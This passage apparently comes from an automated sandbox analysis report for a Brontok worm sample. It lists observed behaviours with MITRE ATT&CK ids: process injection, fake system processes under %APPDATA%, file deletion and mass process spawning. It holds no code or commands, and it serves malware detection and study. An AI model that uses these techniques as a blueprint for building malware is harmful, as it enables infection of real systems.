\"IExplorer.exe\"\n \"WinExec@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"send@WS2_32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindResourceW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetLogicalDriveStringsW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"OpenMutexA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"OpenMutexW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"GetLogicalDriveStringsA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindNextFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateDirectoryA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryExW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"Process32NextW@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"IExplorer.exe\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"IExplorer.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\4K51K4.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\4K51K4.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\4K51K4.EXE\" with delete access\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "15/22 Antivirus vendors marked dropped file \"services.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"lsass.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"IExplorer.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"4k51k4.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"winlogon.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"smss.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"csrss.exe\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"LSASS.EXE\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"SMSS.EXE\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"SERVICES.EXE\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"WINLOGON.EXE\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)\n 15/22 Antivirus vendors marked dropped file \"CSRSS.EXE\" as malicious (classified as \"Worm.Brontok\" with 68% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"K:\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"L:\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"M:\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"N:\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"O:\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"P:\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"Q:\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"R:\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"S:\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"T:\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"U:\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"V:\"\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" (UID: 00000000-00005648)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005900)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005744)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005968)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005832)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005852)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005796)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006092)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006100)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005948)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004192)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006136)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006024)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003924)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003760)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004100)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003484)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004144)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003956)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003400)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003688)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003604)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004088)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004288)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003420)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002460)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004140)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003996)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002812)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002296)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002772)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00002780)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004328)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00001588)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003240)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004120)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003268)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006052)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005980)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001400)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00000648)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003512)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002764)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002768)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004148)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00000824)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004080)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003908)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003560)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002616)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003184)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003744)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002196)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00001844)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 372)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 372)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 372)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 372)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 372)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 416)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 372)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 576)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 576)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 576)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 604)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 604)\n \"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 604)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 428)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 428)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 428)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 312)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 312)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 312)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 312)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 312)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 312)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 312)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 312)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\" allocated memory in \"C:\\53f9ee68f24902418c65d8f99d2ab9464232406db5acbb2e74268de552ef6199.exe\"\n \"4k51k4.exe\" allocated memory in \"%WINDIR%\\4k51k4.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005852)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005796)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00006100)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004192)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00006136)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00006024)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003924)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003760)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004100)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003484)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003956)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003400)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003604)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004288)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004140)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003996)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002772)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00004328)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004120)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003268)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00006052)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005980)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00001400)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00000648)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003512)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002764)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002768)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004148)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00000824)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004080)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003908)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003560)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002616)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003184)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003744)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002196)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00001844)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003736)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003544)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00003480)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005004)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": 